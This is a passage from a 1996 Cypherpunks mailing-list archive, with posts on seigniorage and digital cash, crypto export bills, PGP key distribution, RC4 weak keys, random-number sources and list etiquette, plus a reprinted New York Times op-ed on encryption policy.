      [ME seigneurage, fr. MF, right of the lord, esp. to coin
      money, fr. seigneur + age]

      1: a government revenue derived from the manufacture of
      coins that is calculated in the U.S. as the difference
      between the monetary and the bullion value of the silver
      contained in silver coins disregarding any alloy metal,
      all the metals contained in minor coins (as teh nickel
      and the cent), or the silver bullion that is held as
      backing for silver certificates -- compare brassage.

      2 archaic: Dominion, Power.

   -----

   brassage

      1: a charge made to an individual under a system of free
      coinage for the minting of any gold or silver he may
      bring to the mint and usu. calculated to cover various
      costs -- compare seigniorage.

   -----

   Still, Jim Gleick seems to be citing a special extension of
   this general definition, wherein government capitalizes on
   its money-coining power to reap any ancillary benefit, such
   as the float on money transactions. Is it not likely that
   there are other seigniorages of running the public till, as
   Kawika Gaguio suggests, or even such as pleasurably 
   performed a la droit du seigneur cited by Simon?

   Another definition of seigniorage is that of any means to
   generate benefits for the lord. Along that line, I wonder if 

   governments might not apply brassage to E-money.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 6 Apr 1996 17:47:37 +0800
To: cypherpunks@toad.com
Subject: Re: unsubscrive
Message-ID: <ad8b328b20021004dcf5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 PM 4/5/96, robalo wrote:
>unsubscrive * robalo@elogica.com.br
> unsubscrive * robalo@elogica.com.br
> unsubscrive * robalo@elogica.com.br

Maybe these dweebs are posting from an alternate universe? A universe in
which not even messages explaining that "unsubscrive," "unsuscribe,"
"undescribe," "unscribe," and "unimbibe" are not valid alternate spellings
of "unsubscribe."

I've copied my short explanation of how to subscribe and unsubcribe too
many times to do it again; and it is clear that these folks are either
doing this out of spite, are not reading any of the messages we send them,
or think it funny.

This may kill off the Cypherpunks list even where Detweiler's massive rants
failed. (Now that Detweiler's cabin in Montana has been raided, and one of
his tentacles carried off, who will fill his shoes? Vlad the VZNuri is well
on his way to matching Detweiler's volume, if not his obsessiveness.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 6 Apr 1996 19:12:05 +0800
To: Eric Eden <erice@internic.net>
Subject: Re: Using crypt()
Message-ID: <199604060645.WAA20225@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:47 PM 4/4/96 -0400, Eric Eden <erice@internic.net> wrote:
>I'm testing a encryption program that includes use of crypt().  
Out of curiousity, why use crypt() instead of, say, MD5, which is
stronger and allows arbitrarily long passphrase input?  You could 
add a crypt()-like salt to it as well, if that helps.
And just as crypt() lets you distinguish between input and output
based on length and character set, if you use MD5, you know the
output is 128 bits, rendered either as raw bits or 32 hexes
depending on your program environment.

With crypt(), for users who don't remember their passwords, you can
run crack to try and recover them.  This doesn't work, of course,
if your stored "encrypted password" is really an unencrypted
non-13-byte string which wouldn't ever be the output of crypt().
MD5, on the other hand, allows enough passphrase space that a brute force
search would take much longer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sat, 6 Apr 1996 20:02:53 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u5QPq-0008xyC@pacifier.com>
Message-ID: <199604060648.WAA11201@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> By now, you've probably seen my comment to Unicorn, that ISP's could easily 
> pool their resources, in a form of insurance, to guarantee that any test 
> case will be fully litigated to ensure that a bad precedent isn't set.  What 
> if it cost a million dollars?  That's only about 5 cents per American 
> Internet user.
> 
> You were saying about "going bankrupt"?
> 

	I urge Mr. Bell to start an ISP insurance company, then.  Let
us see how long it lasts. Perhaps I should put up a web page for the
betting pool we can have.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Sat, 6 Apr 1996 17:56:59 +0800
To: cypherpunks@toad.com
Subject: rc4 weak keys fix?
Message-ID: <3165F409.286E@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


I got a paper from the cryptography technical report server
"http://www.itribe.net/CTRS/" about a weak class of RC4 keys.  The
report said that with some keys, it was possible to predict what some
parts of the State-Box would be.  I was thinking of a way to fix this,
and had this idea:

do some sort of hashing function with the key that derives a number
between 55 and 500 or something like that, then scrabmle the S-box that
many times.  In this way, the chances that the State-Box will have any
correlation becomes extremely small.  I think it is 1/125 to begin with
anyway, so this would make it around  1/(125*NumPasses).  And since the
exact number of passes is a function of the key, the cracker won't know
how many times it went through.   I tried this out and having 1000s of
passes doesn't effect the randomness of the state-box in any negative
way, possibly it makes it more random? If anyone has any thoughts I'd
love to hear them.
--
thecrow@iconn.net
"It can't rain all the time"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Sat, 6 Apr 1996 18:24:35 +0800
To: cypherpunks@toad.com
Subject: coderpunks questions
Message-ID: <3166020B.17A2@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


I am really into programming and the math involved in crypto, and could 
care less about the politics.  I assume that coderpunks are more into 
that sort of thing. I have heard they are invitation only. How can I get 
an invite?
-- 
thecrow@iconn.net
"It can't rain all the time"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Gleick <gleick@around.com>
Date: Sat, 6 Apr 1996 19:17:36 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2.2.32.19960406060312.006d58c0@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger wrote:
>
>James Gleick writes:
>> 
>> Seigniorage is actually the Government's interest income on all the
>> currency in circulation.
>
>Seignorage is neither of these things. It is the difference between
>the cost of producing a currency token (like a quarter or a dollar
>bill) and the face value of the token. In essense, its the profit
>margin on printing or minting money.

You're giving a definition straight from a dictionary--an old one. Welcome to the modern world.

>> It's not obvious, but it's true, that the Fed collects the "float"
>> on dollar bills you carry in your pocket,
>
>Oh, really? From whom? First I've heard of this.

Then you're learning something new.

>Now, it is indeed true that the Fed holds large numbers of government
>bonds and theoretically earns interest on them, and that banks in a
>free banking system do indeed loan out the money that backs their
>notes. However, the fed has no mechanism to earn interest on dollar
>bills, nor, in fact, does it need to.

On the contrary. The Federal Reserve holds Government securities corresponding to the dollar value of currency in circulation. It earns interest income on this amount, and returns this income to the Treasury. This is called seigniorage. It amounts this year to something over $20 billion.

This is a very real issue. To the extent that electronic money replaces currency (reduces the amount in circulation), it will cost the Treasury seigniorage--and the Government is acutely aware of this. Whether the beneficiaries are consumers, banks, or other issuers of digital cash will depend on the system. 


--
James Gleick
gleick@around.com
http://www.around.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 6 Apr 1996 20:57:51 +0800
To: jpps@voicenet.com
Subject: Re: pgp keys
Message-ID: <199604060900.BAA24994@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:55 AM 4/4/96 -0500, Jack P. Starrantino   jpps@voicenet.com wrote:
>Is there a reliable method for obtaining the pgp public key for an
>arbitrary email address? [....] to obtain keys I do not have.

Reliable?  No; not everybody follows The One True KeyDistribution Method,
or even follows one-or-more of the popular electronic approaches, 
and not all keys that are distributed electronically are on the Internet,
though some of them may be on intranets or fido or uucp nets.

There's also the problem that the results are not unique.  If you look
at the MIT keyserver, http://www-swiss.ai.mit.edu/~bal/pks-toplev.html,
in the cluttered "Bill Stewart" namespace, you'll find several Bill Stewarts,
and you'll find many people have multiple keys for each email address,
especially after they've been in the servers a few years.

>I've caught some of the discussion on key servers, and noted some
>people's use of their signature, plan, or home page to distribute their
>keys.  Are some combination of these suitable today? 

There's a collection of keyservers that stay in sync with each other,
including the ones at pgp.mit.edu.  bal's http interface is a popular
way to access them, though there are others communications methods as well.
Some other people use finger; finger's really just a telnet to port 79
while sending a requested name and holding the connection up to wait for
replies,
but not everybody uses that either, and many host systems don't serve finger.
My work PGP address is available on my company's internal phone-book web,
and printed on my business cards, though I have now put it on MIT's server.

>Is there a parseable convention in use for extracting keys from
mail/finger/html?
Sure - the standard ASCII form that PGP extracts keys in is parseable by PGP.
(You have to be careful, when obtaining keys by mail/finger/html, that if you
get multiple keys, you do something appropriate, like split them up first.)
Unfortunately, Real PGP likes to ask you interactively if you want to add
the keys it found to a keyring, or whatever, but you could just feed it
some "Y"s on stdin to keep it happy.  The new PGP 3.0 stuff will have libraries
so it's much easier to build clean routines to do this rather than interact.

>My goal is to make encryption the default behavior on outgoing mail. I
>am not concerned about local security.

Good luck!  You'll probably have to prompt the user at least for
disambiguation, and possibly for methods for finding keys as well.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 6 Apr 1996 19:40:23 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: PICS required by laws
In-Reply-To: <01I36YAYMC3K8ZE63H@mbcl.rutgers.edu>
Message-ID: <AlNVRNm00YUvRBRsgL@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


The ACLU is taking the right position here, IMHO. But I sense no
consensus from the coalition of groups in the CDA challenge.

-Declan



Excerpts from internet.cypherpunks: 5-Apr-96 PICS required by law by "E.
ALLEN SMITH"@ocelot. 
>         What was I saying a while back about mandatory PICS through
liability?
>  
> As I recall, various people such as TCMay were saying that it wouldn't
happen.
>  
> Looks like I need to get out that article against PICS that I was working on
> and rewrite it a bit. I would remind people that PICS allows parents (or
> whoever else is holding the reins, such as an ISP - or the Chinese
firewall) t
> o
> filter on such content as material (including scientific studies)
stating that
>  
> a given illegal drug is not as harmful as some would claim, any idea futures
> market - even a simulated one, on homosexual content separately from
> heterosexual, and against criticisms of religions (such as Scientology). To
> their credit, the ACLU (in the CDA court case) has stated that they will not
> put a PICS rating on their web site, even if it contains "indecent" or
> allegedly "harmful to minors" material. I agree strongly with their position.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sat, 6 Apr 1996 22:30:57 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: myths of software "standards"
In-Reply-To: <199604052239.OAA27249@netcom16.netcom.com>
Message-ID: <Pine.BSF.3.91.960406032352.2796A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> there is tremendous ranting and raving in the Web world about how
> the HTML standard is fragmenting because of Netscape etc., and there
> is so much angst about trying to devise a *single* cohesive, unified
> standard that "everyone" follows. people talk as if Netscape is
> trying to "hijack" the standard, when in my opinion they are performing
> a valuable public service of trying to hammer the bits into useful
> form. everything they have proposed could not be handled by the
> earlier standards-- and if it could have been, chances are they would
> have used that standard.

Sure, the Netscape extensions are nice. And it's nice to have an operating
system (M$-DOG) pre-installed on every hard drive. But Net$cape, like M$,
was trying to esablish a dominant "follow-us-or-die" position in the 
industry. 

Yes, the Net$cape extensions allow people to do stuff that they wouldn't 
otherwise be able to do. But, the extensions *could have* been 
implemented in such a way that using them wouldn't be detrimental to 
non-Net$cape browsers. Instead, they've altered the World Wide Web in 
such a way that it can only be viewed "correctly" with Net$cape.

The rest of your post was quite interesting. I *do* think it would be 
good to have multiple, interchangeable formats like we do for graphics. 
What we really need to make that happen are DETAILED SPECIFICATIONS. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 7 Apr 1996 02:19:42 +0800
To: cypherpunks@toad.com
Subject: RNG_DEVICE Environment Variable?
Message-ID: <199604061226.HAA12458@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



Considering a couple of RNG hardware manufacturers use different 
names for device interfaces, perhaps it would be 'convenient' to 
have apps look for the environment variable RNG_DEVICE which gives 
the name of whatever device is used (rnadom$, random, rand, even 
lpt2...) or even a special file that is mixed periodically by a cron 
job (noiz.c?).

The assumption is that reads from that device would return "truly 
random" bytes (not from a pseudo-RNG), either from specialized 
hardware or a system-noise sampler such as noise.sys (DOS) or 
random.c (Linux, FreeBSD).

How software would handle not getting enough bytes is another matter, 
perhaps left configurable to the app.

Rob. 

---
Send a blank message with the subject "send pgp-key"
to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 6 Apr 1996 23:32:35 +0800
To: cypherpunks@toad.com
Subject: Peeking at Your PC
Message-ID: <199604061256.HAA29769@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, April 6, 1996, p. 23.


   Peeking at Your P.C. [Op-Ed]

   By Simson L. Garfinkel


   Cambridge, Mass.

   As more Americans use electronic mail, buy products over
   the Internet and keep their most personal records on
   desktop computers, there is increasing demand for
   cryptography software that can insure the privacy of
   personal electronic communication.

   This technology already exists, but the Government, through
   export-control regulations, effectively bars citizens from
   using it.

   The Government classifies encryption software as munitions,
   because foreign countries can use such programs to hide
   their communications during times of war. To prevent this,
   American companies are largely prohibited from selling to
   foreign customers any programs that include strong coding
   features.

   Unfortunately, that has stifled the domestic market.

   Encryption-software developers find it too expensive to
   create two versions of their programs -- one with strong
   cryptography for domestic use and one with cryptography
   that is weak enough for export. So in the United States,
   developers sell only the weaker cryptography software.

   Last month, a bipartisan group of lawmakers introduced "The
   Encrypted Communications Privacy Act of 1996" to combat
   this problem. But while this measure would increase the
   availability of good cryptography at home, it would limit
   our freedoms in other ways.

   The act would legalize the export of any mass-market
   software if similar technology is already available
   overseas. This would put an end to the futility of
   forbidding such exports at a time when cryptography
   technology is increasingly available around the globe -- in
   libraries and on the Internet. Indeed, the Software
   Publishers Association says that the main result of the
   export regulations simply has been to shift the overseas
   marketing of military-grade cryp tography to foreign
   companies.

   So although the new bill would still prohibit American
   companies from exporting innovative programs, it would at
   least allow them to compete with foreign companies on an
   equal footing.

   However, the Clinton Administration and others oppose this
   minor change, because they are worried that criminals and
   terrorists could use the export liberalization to their own
   advantage.

   Because of this opposition, the bill throws a bone to the
   antiprivacy forces.

   While lifting export controls, it criminalizes some uses of
   cryptography for the first time in our nation's history. It
   would be illegal, for instance, to use encryption that
   interferes with a felony investigation. But the language of
   the bill is so broad that these restrictions could apply to
   a reporter's encrypted computer files.

   The bill also creates legal rules for "key holders" --
   organizations that would be given copies of an individual's
   decryption key, or codebreaker. This means that an
   individual's encoded messages or documents could be
   decoded, under a court order, without his or her knowledge.

   Although the use of key holders would be voluntary under
   the bill, that could easily change and the system could
   become mandatory.

   There is some hope for avoiding all this. Senator Conrad
   Burns, Republican of Montana, plans to introduce a narrower
   bill that focuses simply on liberalizing exports of
   encryption technology.

   The software industry and civil libertarians are already
   supporting this approach -- one that is good not just for
   American business but also for our right to privacy.

   Simson L. Garfinkel is the author of the book "PGP: Pretty
   Good Privacy."

   [End]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omaha Remailer <nsa@omaha.com>
Date: Sun, 7 Apr 1996 01:55:56 +0800
To: WlkngOwl@unix.asb.com.cypherpunks@toad.com
Subject: Re: (Excerpted Fwd) Minnesota Online privacy bill in conference comm
In-Reply-To: <199603310737.CAA13085@unix.asb.com>
Message-ID: <199604061435.IAA14114@glucose.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Could you pust a URL for the actual bill?  I'm having a hard time
tracking it down from the URL you gave.  Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 7 Apr 1996 03:16:00 +0800
To: llurch@networking.stanford.edu
Subject: Re: [NOISE] Re: Fascinating troll with forged newgroups
In-Reply-To: <Pine.SUN.3.92.960404120337.12296A-100000@elaine28.Stanford.EDU>
Message-ID: <199604061537.JAA06070@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Date: Sat Apr  6 09:34:23 CST 1996
To: llurch@networking.stanford.edu
Cc: dlv@bwalk.dm.com, cypherpunks@toad.com
Subject: Re: [NOISE] Re: Fascinating troll with forged newgroups

Rich Graves wrote:
> 
> So is the soc.culture.russian.moderated script freely available yet? I'd
> like to use a stripped-down version thereof (controlling crossposts only)
> for the talk.politics.natl-socialism that Milton Kleim and I proposed a
> week ago.
> 

Yes, the scripts are freely available. The robomoderator has been
working for about three weeks and now I seem to have little problems
supporting it. Our human moderators spend relatively little time because
the majority of posts come from preapproved users, and approval and 
rejection commands are very easy to use.

The thing uses PGP extensively for authentification and secure exchange 
with human moderators. For signing approved articles it uses PMApp 
by Greg Rose.

There are still a couple of optional things to do (such as taking headers 
from PGP-signed parts of messages if they are there), but otherwise it is 
in working condition.

One really important thing to do before handing it out is adding more
comments...

	- Igor.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWaPjcJFmFyXKPzRAQEJtwP/asqR7kbtQ0fc48a4az/IvBndnbLj6BZL
oQgzwieoWZk6BeIyNmNDBHhtn7bXGVm+UoofYsLCxZSbjHfAvbohgryWCncYi2J8
Xjw5Dm47NSq9EoWoSlgogfVUHwLI82JN6T6RQ+IIISg+INjm1/BD1AVuvQ9pQUHv
8cwbccKVsdo=
=9kaj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 7 Apr 1996 06:18:06 +0800
To: "Dave Banisar" <cypherpunks@toad.com>
Subject: Re: ACM/IEEE Letter on Cryp
Message-ID: <m0u5cI0-000909C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


[on the Burns bill]
At 04:55 PM 4/3/96 -0500, Dave Banisar wrote:
>The draft bill which currently exists only takes the export controls on
>crpyto. The provisions on key escrow, criminal penalities and other problems
>are not in there and Burns staff have no intention of letting them in. The
>actual bill will be introduced in about 2 weeks.
>-dave

That sounds okay as far as it goes, but I can see a potential problem.  Your 
wording above is unclear, but if the Burns bill totally eliminates export 
controls that's great. However, we've frequently heard talk of "compromises" 
like the Leahy bill which seem to relate exportable encryption to that which 
is already available overseas.  There have been suspicions around there that 
this is intended to keep the American producers out of the market as long as 
possible, which is still a problem.  I don't think that's acceptable.

It's also not logical.  Even if we assume that the strongest encryption 
available overseas is 2048-bit RSA, that's far more secure than 1024-bit 
PGP, which itself (I've heard...) is probably 1-10 million times stronger 
than 512-bit PGP, and the last is probably just barely within the reach of 
even the NSA with a reasonable amount of resources directed at the task.   
Obviously, this means that the best encryption commonly available is so far 
beyond what the NSA can decrypt, there appears to be no point in denying 
somebody the right to export 3000-bit RSA, when 2048-bit versions are 
already in use.

In addition, even if this condition is assumed, there is a question about 
whether or not export will or must be automatically approved for any program 
which uses encryption equally or less strong than, say, 2048 bit PGP, or 
whether they will refuse export of programs which use encryption to 
implement functions that are "politically incorrect" despite the fact they 
use only "exportable level" encryption.  I could mention a specific example, 
but if you've followed my essays you already know what I'm talking about.  
The government could still deter new and innovative ideas utilizing 
encryption that themselves don't already exist overseas.

I think there's a serious enough danger here that we should insist on (at 
least) wording that completely takes the decision-making authority out of 
the government's hands for encryption that uses the same or less key length 
than the maximum available overseas, regardless of its function.  I don't 
want even this minimal restriction, but if that's what it takes to pass the 
Burns bill, it's progress anyway.  I'm sure somebody can (or already has) 
extend foreign-source PGP to 4096-bit keys to push the limit well beyond any 
practical limit, if 2048 bits isn't  there already.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alexander 'Sasha' Chislenko" <sasha1@netcom.com>
Date: Sun, 7 Apr 1996 02:31:17 +0800
To: cypherpunks@toad.com
Subject: FWD: On digital cash and geodesic economies
Message-ID: <2.2.32.19960406150904.00d4918c@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Haven's seen anything on Bionomics list for a month.
Is the list silent, or is it just me.

I hope you will find the following article relevant to bionomics.

--- begin forwarded text

From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 4 Apr 1996 21:21:19 -0500
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: Wired didn't like this one....

-----BEGIN PGP SIGNED MESSAGE-----

 ...but I like it. Said it was a little too "fast paced". (For WIRED???)

I'm starting over on another, so you guys might as well see this one...

It *was* supposed to go into their Idees Fortes (Or, as my brother Mike in
Albuqerque says, in his best Jose Jimenez, "Stron' Gideas") section. Now
something else is, once I write it. Feh!

It's 800 words. Exactly.

Cheers,
Bob Hettinga



  ------------------------
Geodesic Capital?

Robert Hettinga

I've just finished a bit of anonymous consulting on the net for an
anonymous client, being paid, of course, in anonymous digital ecash(tm). I
could just store it, offsite even, anonymously. But, I'm saving it for that
special retirement habitat in the Belt ("Gerry's Habitats, Inc.: Pie in the
sky, Nano-Built(tm) *before* you die!"). I have to *invest* it somewhere.

I buy a page of mutual fund reccomendations from a LipperBot(tm). In my
case, I just want to buy a broad market index, say, the (ahem) Hettinga
Million(tm), and shop around for the fund server which approximates closest
the HM's price over time. I link to the server, and buy anonymous bearer
certificates for that server's HM fund.  Later, when I cash in my
certificates, I have enough appreciated capital to buy the custom Bernal
sphere of my dreams. Of course, if my tolerence for risk is higher, I could
buy shares from a fund manager (bot or otherwise, no way to tell with
anonymous cash markets) with a hot hand for picking stocks.

OK. Say I don't actually *save* money.  I'm someone who borrows money for
very short term "assets" like resturaunt meals, and pays the incurred debt
off over the long term at some userous interest rate. How do I do this?

I issue a personal digital bearer bond for the amount of the transaction.
All I need is someone to underwrite the risk. Fortunately, I always have an
efficient real-time market to auction it into, one that always knows my
payment reputation, thanks to all those money-bots in the ubiquitous
network. Voila'! Bring on the chateaubriand for one, waiter, and don't
spare the bearnaise, all this thinking about money's made me hungry.


What we're talking about here is nothing new, of course. We've had trade
ever since we've had artifacts. The ancient "red-paint" culture was just a
trading network which ran around the north Atlantic from New England to as
far as Ireland. So much for the "New" World.  The oldest surviving
Babylonian money is a piece of clay saying "three cows" wrapped in a clay
"envelope" saying something like "three cows, payable on demand, so say I,
(signed) Joe Nebbuchenazzar". This happened shortly after writing was
invented, which was actually invented for *accounting*. Mechanical
signatures like chops and seals have been around since. Digital signatures
and bearer certificates are just a new implementation of some *very* old
stuff.

Ornate paper certificates, representing shares in companies, or actual
stuff, was physically traded for other ornate paper certificates (cash), or
actual stuff, at places like the famous buttonwood tree on Wall Street.
Pretty soon people didn't have to be there to trade. We built fast
industrial communications (staged horsemen or coaches, then ships or
trains, then telegraphy, then telephony) but we still had slow switches
(people), so we had to build all the communication/organization/market
hierarchies we know and love today.  In addition, the power of the state
(another industrial communication heirarchy) provides a sizable argumentum
ad bacculum for people who repudiate trades. If you don't pay, I throw you
in jail.

Like every thing else, Moore's law changes that.  Proportionately,
semiconductor switches get more and more cheaper than lines, so the
telephone network is no longer a hierarchy. Nodding to Buckminster Fuller,
Peter Huber called it the "Geodesic Network", the title of the 1986
government report he wrote describing it.  Ironic. I'm here saying this in
a magazine founded by deciples of Stwart Brand, himself a one-time
Fullerite. All threads lead to Bucky.

When you combine a geodesic network with strong cryptography, you get a
geodesic economy, which needs geodesic capital. Just change the size of
players in either equity or debt scenario, and you're looking at what any
large business organization does today. The only thing you're missing is
how to deal with non-repudiation. If the state can't tax transactions or
financial assets because strong crypto makes them all invisible, states
can't exist, much less "bacculize" very well. The solution is the same it
ever was: reputation. J. Pierpont Morgan said, when hauled before Congress
one afternoon, "Character, sir. I wouldn't buy anything from a man with no
character, even if he offered me all the bonds in Christendom." In a
geodesic economy, reputation is abstracted to keys, not people.

Geodesic capital scales up to bigger stuff than we can do now. A chaotic
hoarde of autonomous money-bots swarms on the minutia of the necessary
financial complexity. It also scales *down* as processor prices fall. Real
time, MicroMint(tm) cash-on-the-router-head auctions for packet switching,
anyone?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWR/ovgyLN8bw6ZVAQHCkQP7BPmSNibfRQLeZETvRkUVGJdPB0WOYrTM
yU33wwqDPBEcwfYLgX4oBcAfHv/Kfvr1vH4bBTioEVyanVDtJLt9KL/62kn+Ot+/
BLDdBM6Km1R/xRD9xnvQd5Kyz2INQCmNU7ZJk3BQpK484V74aW6We155fH2ovjr3
TgQ6mYMe7rs=
=GVNA
-----END PGP SIGNATURE-----

--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
for details...
-------------------------------------------------

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alexander 'Sasha' Chislenko" <sasha1@netcom.com>
Date: Sun, 7 Apr 1996 03:59:05 +0800
To: cypherpunks@toad.com
Subject: Re: [mis]FWD: On digital cash and geodesic economies
Message-ID: <2.2.32.19960406161654.00dbac68@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry - sent previous post  to  cp instead of bionomics.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 7 Apr 1996 04:42:57 +0800
To: JonWienke@aol.com
Subject: Re: Spinners and compression functions
In-Reply-To: <960405210713_185610686@emout10.mail.aol.com>
Message-ID: <199604061626.LAA07799@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



JonWienke@aol.com writes:
> Since there has been a lot of discussion about spinners derived from various
> things (idle loops, video retrace, etc.) used as entropy sources, here is yet
> another idea.  Run the spinner output through a PKZip type compression
> function, and then seed a PRNG with the output from that.  This would provide
> a means of gauging the amount of entropy that has been fed into the PRNG,
> (count the bytes output from the compression function)

Actually, it doesn't. The entropy present from a reasonable source
like keyclick timings is much much lower than the output of pkzip is
going to suggest to you.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 7 Apr 1996 06:10:44 +0800
To: "Alexander 'Sasha' Chislenko" <cypherpunks@toad.com
Subject: Re: FWD: On digital cash and geodesic economies
Message-ID: <ad8bf2ec250210040f94@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:09 PM 4/6/96, Alexander 'Sasha' Chislenko wrote:
>Haven's seen anything on Bionomics list for a month.
>Is the list silent, or is it just me.
>
>I hope you will find the following article relevant to bionomics.

But, Sasha, this is the Cypherpunks list...

Seriously, several years ago I started hearing the hype and hoopla about
"Bionomics." Following the book, the conference. Then the seminars, the
training packages, and perhaps even the cult. The book didn't seem to say
anything new, except that markets and various other systems share some
emergent commonalities.

What made me think of it as a cult is when the groupies joined, the staff
was hired, and the publicity campaign began. "The Bionomics Institute"?

But who am I to question EST^H^H^Hbionomics?

Personally, I have accepted Eric Drexler as my personal savior in the Churh
of the Assembler Multitude.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 7 Apr 1996 04:20:57 +0800
To: James Gleick <gleick@around.com>
Subject: No Subject
In-Reply-To: <2.2.32.19960406060312.006d58c0@pop3.interramp.com>
Message-ID: <199604061646.LAA07847@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Incidently....

James Gleick writes:
> >Seignorage is neither of these things. It is the difference between
> >the cost of producing a currency token (like a quarter or a dollar
> >bill) and the face value of the token. In essense, its the profit
> >margin on printing or minting money.
> 
> You're giving a definition straight from a dictionary--an old
> one. Welcome to the modern world.

The definition I use is *still* totally current. One concern when
doing things like switching from dollar bills to dollar coins or
altering printing processes in paper money is a change in seignorage
because of a change in production cost of the currency tokens.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 7 Apr 1996 08:06:56 +0800
To: cypherpunks@toad.com
Subject: Someone's screwing around with anon.penet.fi
In-Reply-To: <9604061342.AA14490@anon.penet.fi>
Message-ID: <Pine.BSF.3.91.960406114609.5026B-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's another one of them unsolicited messages from anon.penet.fi.

